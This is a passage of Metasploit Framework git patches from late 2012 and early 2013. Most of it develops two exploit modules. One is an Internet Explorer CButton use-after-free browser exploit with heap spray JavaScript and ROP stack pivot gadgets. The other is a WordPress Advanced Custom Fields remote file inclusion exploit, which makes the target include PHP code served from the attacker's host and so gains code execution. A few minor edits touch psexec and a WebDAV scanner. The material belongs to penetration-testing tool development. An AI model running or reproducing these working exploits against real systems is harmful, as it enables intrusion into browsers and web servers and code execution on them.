'Offset' => '0x586' } ], # 0x0c0c0b30 - [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", From eed5a74f3216fad03aec3f154b967a3cdecb5216 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 30 Dec 2012 16:08:01 +0100 Subject: [PATCH 110/154] description updated and reference added --- .../exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index ec3602bcc7..86589bf0f1 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -18,10 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. A - use-after-free condition occurs when a CDwnBindInfo object is freed by - FollowHyperlink2, but a reference is kept in CDoc. As a result, when the reference - is used again during a page reload, an invalid memory that's controllable is used, - and allows arbitrary code execution under the context of the user. + use-after-free condition occurs when a CButton object is freed, but a reference + is kept and used again during a page reload, an invalid memory that's controllable + is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers. @@ -40,7 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], - [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ] + [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], + [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] ], 'Payload' => { From 14f21c0a299cceae9eab027c1711e739837015c8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 30 Dec 2012 16:13:48 +0100 Subject: [PATCH 111/154] using the rop as expected --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 86589bf0f1..2060047585 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -152,7 +152,7 @@ Stack Pivoting to eax: case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") - if t['Name'] =~ /Windows XP/ + if t.name =~ /Windows XP/ stack_pivot = [0x77c15ed6].pack("V") * 54 # ret stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c From cc52e2c5338521eb3a141e1338376ed8834e6268 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 30 Dec 2012 12:58:16 -0600 Subject: [PATCH 112/154] Where's Juan's name? --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index 2060047585..cf9aa15568 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'eromang', 'mahmud ab rahman', + 'juan vazquez', 'sinn3r' #Metasploit ], 'References' => From 7cb42a5eb4f7fec31d10b5cd32ee5e39f1f4400d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 30 Dec 2012 18:14:22 -0600 Subject: [PATCH 113/154] Add BID ref --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index cf9aa15568..f00ceffde8 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2012-4792' ], [ 'US-CERT-VU', '154201' ], + [ 'BID', '57070' ], [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], From 1084334d5effb0425bf0f589e57f701d5fd1a3d8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Sun, 30 Dec 2012 20:34:14 -0600 Subject: [PATCH 114/154] Randomness --- modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb index f00ceffde8..8562654902 100644 --- a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb +++ b/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) - js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0b30 js = %Q| @@ -125,7 +125,6 @@ class Metasploit3 < Msf::Exploit::Remote for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } - var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) @@ -236,7 +235,7 @@ Stack Pivoting to eax: arrObject[i].className = unescape("ababababababababababababababababababababa"); } var eip = window; - var data = "https://www.google.com/settings/account"; + var data = "#{Rex::Text.rand_text_alpha(41)}"; eip.location = unescape("%u0b30%u0c0c" + data); } From 2b3f7c4430a299b45fdb505e2e5655ccf95f6a4a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 31 Dec 2012 00:29:19 -0600 Subject: [PATCH 115/154] Module rename Sorry, Tod, this must be done. --- .../windows/browser/{ie_cdwnbindinfo_uaf.rb => ie_cbutton_uaf.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/browser/{ie_cdwnbindinfo_uaf.rb => ie_cbutton_uaf.rb} (100%) diff --git a/modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb similarity index 100% rename from modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb rename to modules/exploits/windows/browser/ie_cbutton_uaf.rb From f7543e18fe735bf50f9b4127eec6dd74c0f2d2bd Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 31 Dec 2012 00:35:13 -0600 Subject: [PATCH 116/154] Your def of commit apparently is a little different than mine, git. --- .../windows/browser/ie_cbutton_uaf.rb | 37 ++----------------- 1 file changed, 3 insertions(+), 34 deletions(-) diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 8562654902..fa29e78184 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", + 'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference @@ -187,37 +187,11 @@ Stack Pivoting to eax: - +
From a3b7318aa6777ccb32bda3841e4ab076c312c3ba Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 31 Dec 2012 14:51:04 -0600 Subject: [PATCH 117/154] Ignoring files that end in tilde --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 5651548b7f..fa30beacb0 100644 --- a/.gitignore +++ b/.gitignore @@ -22,3 +22,4 @@ tags *.swp *.orig *.rej +*~ From b05d6cf835275442c6c46f95992ff5b1675ed0fa Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 31 Dec 2012 15:11:20 -0600 Subject: [PATCH 118/154] Tidying psexec --- modules/exploits/windows/smb/psexec.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index edf6593d20..14b3454d45 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -50,7 +46,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Privileged' => true, 'DefaultOptions' => { From 2fe2d5d3dda1e6a3c5134be4d1c0d1b59096ecde Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Tue, 1 Jan 2013 22:52:55 +0000 Subject: [PATCH 119/154] Adding exploit for OSVDB 87353 Adding an exploit for OSVDB 87353, which allows for a remote file inclusion in the Advanced Custom Fields plugin for Wordpress. and shell given that url include is enabled in the php installation. --- .../http/wp_advanced_custom_fields_exec.rb | 96 +++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb new file mode 100644 index 0000000000..dad9388cb3 --- /dev/null +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -0,0 +1,96 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', + 'Description' => %q{ + This module exploits a remote file inclusion flaw in the WordPress + blogging software plugin known as Advanced Custom Fields. The vulnerability allows for + remote file inclusion and remote code execution via the export.php script. The + Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. + }, + 'Author' => + [ + 'Charlie Eriksen', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['OSVDB', '87353'], + ['URL', 'http://secunia.com/advisories/51037/'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 262144, # 256k + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Nov 14 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/actions/export.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def php_exploit + + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + pluginPath = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php' + + print_status('Sending request') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}#{pluginPath}", + 'data' => "acf_abspath=#{php_include_url}" + }) + + if res and res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") + end + + handler + + end + +end + From dd0482cb9d05f94a5b5f4440d2042e18a62b3fd7 Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Tue, 1 Jan 2013 23:01:14 +0000 Subject: [PATCH 120/154] Code style fix! Now variable names are in-line with the coding guidelines! --- modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb index dad9388cb3..c8a540d4eb 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -75,12 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path uri << '/' if uri[-1,1] != '/' - pluginPath = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php' + plugin_path = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php' print_status('Sending request') res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}#{pluginPath}", + 'uri' => "#{uri}#{plugin_path}", 'data' => "acf_abspath=#{php_include_url}" }) From 4ba5b45ad3e9c2f34082d6ad1f87527f3927f5cd Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Tue, 1 Jan 2013 23:15:10 +0000 Subject: [PATCH 121/154] Fixed the check Turns out the export returns a 500 by default. Fixing. --- modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb index c8a540d4eb..acbe257022 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -59,8 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/actions/export.php" + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/api.php" }) if res and res.code == 200 From 6fb2130265dda2f4521062b48d99aae0dad3ca49 Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Tue, 1 Jan 2013 23:40:01 +0000 Subject: [PATCH 122/154] Adding a damn space It suddenly jumped at me that there was a missing space in the module info. Couldn't unsee. --- modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb index acbe257022..e6416a9ede 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Nov 14 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options( [ From 88d12da3dbf6bbeff235bbdd5dd04c2999933182 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Wed, 2 Jan 2013 13:27:25 -0500 Subject: [PATCH 123/154] hilight positive results in WebDAV scanner As suggested by Lee Baird --- modules/auxiliary/scanner/http/webdav_scanner.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 9d1deacf9a..fcf5de1cc4 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary wdtype = 'SHAREPOINT DAV' end - print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED") + print_good("#{target_host} (#{tserver}) has #{wdtype} ENABLED") report_note( { From ef3f15e881ac1e7b9ac26ad4d5d957cf9afe35e5 Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Wed, 2 Jan 2013 18:56:49 +0000 Subject: [PATCH 124/154] Adding a PLUGINSPATH option Adding a PUGINSPATH option as per FireFart's comment. Because the path to plugins(and wp-content) can be changed, I've added a PLUGINSPATH options. This allows for targeting of sites where either folder has been moved, by specifying the relative path to where all plugins are stored. --- .../http/wp_advanced_custom_fields_exec.rb | 193 +++++++++--------- 1 file changed, 97 insertions(+), 96 deletions(-) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb index e6416a9ede..8507e601c4 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -1,96 +1,97 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::PHPInclude - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', - 'Description' => %q{ - This module exploits a remote file inclusion flaw in the WordPress - blogging software plugin known as Advanced Custom Fields. The vulnerability allows for - remote file inclusion and remote code execution via the export.php script. The - Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. - }, - 'Author' => - [ - 'Charlie Eriksen', - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['OSVDB', '87353'], - ['URL', 'http://secunia.com/advisories/51037/'], - ], - 'Privileged' => false, - 'Payload' => - { - 'DisableNops' => true, - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Space' => 262144, # 256k - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], - 'DisclosureDate' => 'Nov 14 2012', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), - ], self.class) - end - - def check - uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}wp-content/plugins/advanced-custom-fields/core/api.php" - }) - - if res and res.code == 200 - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end - end - - def php_exploit - - uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - plugin_path = 'wp-content/plugins/advanced-custom-fields/core/actions/export.php' - - print_status('Sending request') - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}#{plugin_path}", - 'data' => "acf_abspath=#{php_include_url}" - }) - - if res and res.code != 200 - fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") - end - - handler - - end - -end - +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', + 'Description' => %q{ + This module exploits a remote file inclusion flaw in the WordPress + blogging software plugin known as Advanced Custom Fields. The vulnerability allows for + remote file inclusion and remote code execution via the export.php script. The + Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. + }, + 'Author' => + [ + 'Charlie Eriksen', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['OSVDB', '87353'], + ['URL', 'http://secunia.com/advisories/51037/'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 262144, # 256k + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Nov 14 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), + OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']), + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def php_exploit + + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php" + + print_status('Sending request') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}#{plugin_path}", + 'data' => "acf_abspath=#{php_include_url}" + }) + + if res and res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") + end + + handler + + end + +end + From 78c6d04b310d226d0bd1362b45871441d4497338 Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Wed, 2 Jan 2013 20:14:09 +0000 Subject: [PATCH 125/154] Fixing from crlf to lf By accident the line endings changed to crlf. Mihi pointed out that the last diff was funky because the commit by accident had crlf rather than the lf from the initial commits. Also adding an email, as per the HACKING guide and since hdm pointed out the usefulness of it. --- .../http/wp_advanced_custom_fields_exec.rb | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb index 8507e601c4..af857bdc81 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb @@ -1,97 +1,97 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::PHPInclude - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', - 'Description' => %q{ - This module exploits a remote file inclusion flaw in the WordPress - blogging software plugin known as Advanced Custom Fields. The vulnerability allows for - remote file inclusion and remote code execution via the export.php script. The - Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. - }, - 'Author' => - [ - 'Charlie Eriksen', - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['OSVDB', '87353'], - ['URL', 'http://secunia.com/advisories/51037/'], - ], - 'Privileged' => false, - 'Payload' => - { - 'DisableNops' => true, - 'Compat' => - { - 'ConnectionType' => 'find', - }, - 'Space' => 262144, # 256k - }, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], - 'DisclosureDate' => 'Nov 14 2012', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), - OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']), - ], self.class) - end - - def check - uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php" - }) - - if res and res.code == 200 - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end - end - - def php_exploit - - uri = target_uri.path - uri << '/' if uri[-1,1] != '/' - - plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php" - - print_status('Sending request') - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}#{plugin_path}", - 'data' => "acf_abspath=#{php_include_url}" - }) - - if res and res.code != 200 - fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") - end - - handler - - end - -end - +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::PHPInclude + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', + 'Description' => %q{ + This module exploits a remote file inclusion flaw in the WordPress + blogging software plugin known as Advanced Custom Fields. The vulnerability allows for + remote file inclusion and remote code execution via the export.php script. The + Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. + }, + 'Author' => + [ + 'Charlie Eriksen ', + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['OSVDB', '87353'], + ['URL', 'http://secunia.com/advisories/51037/'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Compat' => + { + 'ConnectionType' => 'find', + }, + 'Space' => 262144, # 256k + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Nov 14 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), + OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']), + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def php_exploit + + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + plugin_path = "#{datastore['PLUGINSPATH']}advanced-custom-fields/core/actions/export.php" + + print_status('Sending request') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}#{plugin_path}", + 'data' => "acf_abspath=#{php_include_url}" + }) + + if res and res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") + end + + handler + + end + +end + From 97253d46a146b13d6ba157e08835e53224707ac1 Mon Sep 17 00:00:00 2001 From: Charlie Eriksen Date: Wed, 2 Jan 2013 21:19:06 +0000 Subject: [PATCH 126/154] Multiple change for Juan Incooperated changes as per Juan's suggestions. - Removed redundant space option for the payload - Doing the uri more intelligently - Detecting allow_url_include being disabled and reporting it - Moved to unix/webapp - Removed redundant handler call - Adding to description that this requires allow_url_include to be enabled --- .../webapp}/wp_advanced_custom_fields_exec.rb | 21 ++++++++++--------- 1 file changed, 11 insertions(+), 10 deletions(-) rename modules/exploits/{multi/http => unix/webapp}/wp_advanced_custom_fields_exec.rb (81%) diff --git a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb similarity index 81% rename from modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb rename to modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb index af857bdc81..d81df24206 100644 --- a/modules/exploits/multi/http/wp_advanced_custom_fields_exec.rb +++ b/modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb @@ -20,7 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The - Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. + Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit + only works when the php option allow_url_include is set to On(Default Off). }, 'Author' => [ @@ -40,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote { 'ConnectionType' => 'find', }, - 'Space' => 262144, # 256k }, 'Platform' => 'php', 'Arch' => ARCH_PHP, @@ -58,10 +58,12 @@ class Metasploit3 < Msf::Exploit::Remote def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' + uri << datastore['PLUGINSPATH'] + uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}#{datastore['PLUGINSPATH']}advanced-custom-fields/core/api.php" + 'uri' => "#{uri}advanced-custom-fields/core/api.php" }) if res and res.code == 200 @@ -72,25 +74,24 @@ class Metasploit3 < Msf::Exploit::Remote end def php_exploit - uri = target_uri.path 